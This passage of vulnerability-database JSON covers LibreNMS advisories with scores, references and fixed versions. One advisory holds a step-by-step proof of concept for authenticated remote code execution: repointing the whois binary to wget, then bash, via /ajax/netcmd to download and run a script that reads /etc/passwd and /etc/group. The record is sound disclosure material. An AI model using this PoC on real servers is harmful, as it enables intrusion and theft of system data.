ference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/4f86915866703e2fcd1e34b3fc1181ec2ad78e54","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/4f86915866703e2fcd1e34b3fc1181ec2ad78e54"},{"reference_url":"https://huntr.dev/bounties/13951f51-deed-4a3d-8275-52306cc5a87d","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/13951f51-deed-4a3d-8275-52306cc5a87d"},{"reference_url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0575","reference_id":"CVE-2022-0575","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0575"},{"reference_url":"https://github.com/advisories/GHSA-hxmr-5gv9-6p8v","reference_id":"GHSA-hxmr-5gv9-6p8v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hxmr-5gv9-6p8v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60660?format=json","purl":"pkg:composer/librenms/librenms@22.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2022-0575","GHSA-hxmr-5gv9-6p8v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-76bn-2u1y-kqf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91646?format=json","vulnerability_id":"VCID-7f5s-p5u4-abhh","summary":"LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write\n### Summary\nA vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads.\n\n### Details\nThe application allows administrative users to configure the absolute binary paths for network diagnostic tools at `/settings/external/binaries`. This setting does not sufficiently validate ensuring the paths remain restricted to safe, intended executables. These tools are invoked by sending a request to the `GET /ajax/netcmd` endpoint. While there is an existing input filter designed to restrict arguments to valid IP addresses or hostnames, this filter can be bypassed.\n\n### PoC\nTo reproduce this vulnerability, a remote HTTP server should be hosted with a malicious script/executable, ensure the remote server is reachable by the server running LibreNMS. The PoC will use the file `malicious.sh` containing the following content. It will return the content of /etc/passwd and /etc/group, current working directory, username that is running the script, and it will list files of the current directory.\n\n```bash\n#!/usr/bin/env bash\n\ncat /etc/passwd\ncat /etc/group\nwhoami\npwd\nls\n```\n\n1. Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost.\n<img width=\"593\" height=\"481\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef235f8e-089b-462c-b12c-7b5ae2037fc5\" />\n\n2. Make sure the malicious script `malicious.sh` can be downloaded. \n<img width=\"516\" height=\"100\" alt=\"image\" src=\"https://github.com/user-attachments/assets/60b04755-e824-4384-81f2-2feacdc8e273\" />\n\n3. Login with an admin account and navigate to Global Settings -> External -> Binary Locations\n<img width=\"797\" height=\"201\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f914cc9e-f45b-444f-8f16-058101d84576\" />\n\n4. Change the whois binary path to the path of wget (e.g. /usr/bin/wget).\n<img width=\"478\" height=\"58\" alt=\"image\" src=\"https://github.com/user-attachments/assets/57fbf033-ff07-41dc-9bac-2f3b3e897ea6\" />\n\n5. Send the request `GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.sh`. The response should contain wget's output, and malicious.sh would be downloaded by the server.\n<img width=\"900\" height=\"209\" alt=\"image\" src=\"https://github.com/user-attachments/assets/942b6082-18db-4838-b06c-b98d7fa1f8d0\" />\n\n6. After that, change the whois binary path to the path of bash (e.g. /bin/bash). \n<img width=\"751\" height=\"56\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0c11d86e-0dab-4780-bdb7-f328bbb758f8\" />\n\n7. Send the request GET /ajax/netcmd?cmd=whois&query=malicious.sh to execute the script. \n<img width=\"846\" height=\"688\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d4dcf8e9-5a75-407c-8dd4-96d11f090dbe\" />\n\n### Impact\nThis vulnerability allows a malicious actor to achieve Remote Code Execution (RCE), potentially leading to complete system compromise, data exfiltration, or lateral movement within the network.\n\n### Remediation Advice\nLoading Binary Path from a config file instead of exposing settings in WebUI can eliminate this issue. If it is not possible, enforcing more validations and fix the `ip_or_hostname` bypass in https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169 to reduce the risk of RCE.\n\n### Prerequisite\nThe attacker must have a valid Administrator account to exploit this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-6204","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00788","published_at":"2026-06-07T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00783","published_at":"2026-06-09T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00782","published_at":"2026-06-08T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00787","published_at":"2026-06-05T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.0079","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-6204"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-13T12:42:55Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-6204","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-6204"},{"reference_url":"https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-13T12:42:55Z/"}],"url":"https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc"},{"reference_url":"https://github.com/advisories/GHSA-pr3g-phhr-h8fh","reference_id":"GHSA-pr3g-phhr-h8fh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pr3g-phhr-h8fh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109874?format=json","purl":"pkg:composer/librenms/librenms@26.3.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.3.0"}],"aliases":["CVE-2026-6204","GHSA-pr3g-phhr-h8fh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7f5s-p5u4-abhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110229?format=json","vulnerability_id":"VCID-7fbt-znx9-ukaj","summary":"Deserialization of Untrusted Data in librenms/librenms\nDeserialization of Untrusted Data in GitHub repository librenms/librenms prior to 22.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3525","reference_id":"","reference_type":"","scores":[{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00312","published_at":"2026-06-06T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00304","published_at":"2026-06-09T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.0031","published_at":"2026-06-05T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00305","published_at":"2026-06-08T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00306","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3525"},{"reference_url":"https://github.com/librenms/librenms/commit/ae3925b09ad3c5d0f7a9d5a26ae2f2f778834948","reference_id":"","reference_type":"","scores":[{"value":"9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-04-24T20:14:43Z/"}],"url":"https://github.com/librenms/librenms/commit/ae3925b09ad3c5d0f7a9d5a26ae2f2f778834948"},{"reference_url":"https://huntr.dev/bounties/ed048e8d-87af-440a-a91f-be1e65a40330","reference_id":"","reference_type":"","scores":[{"value":"9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-04-24T20:14:43Z/"}],"url":"https://huntr.dev/bounties/ed048e8d-87af-440a-a91f-be1e65a40330"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3525","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3525"},{"reference_url":"https://github.com/advisories/GHSA-cv9g-h8mm-xx5h","reference_id":"GHSA-cv9g-h8mm-xx5h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cv9g-h8mm-xx5h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-3525","GHSA-cv9g-h8mm-xx5h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.1","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7fbt-znx9-ukaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55914?format=json","vulnerability_id":"VCID-7m7b-578h-bqhj","summary":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Device Dependencies\" feature\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Device Dependencies\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\"hostname\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47527","reference_id":"","reference_type":"","scores":[{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59815","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59796","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59816","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59824","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.5982","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47527"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74"},{"reference_url":"https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-01T20:34:28Z/"}],"url":"https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47527","reference_id":"CVE-2024-47527","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47527"},{"reference_url":"https://github.com/advisories/GHSA-rwwc-2v8q-gc9v","reference_id":"GHSA-rwwc-2v8q-gc9v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rwwc-2v8q-gc9v"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v","reference_id":"GHSA-rwwc-2v8q-gc9v","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-01T20:34:28Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82814?format=json","purl":"pkg:composer/librenms/librenms@24.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.9.0"}],"aliases":["CVE-2024-47527","GHSA-rwwc-2v8q-gc9v"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7m7b-578h-bqhj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90308?format=json","vulnerability_id":"VCID-7s6j-vmn5-p7eh","summary":"Duplicate Advisory: LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-pr3g-phhr-h8fh. This link is maintained to preserve external references.\n\n## Original Description\nLibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web 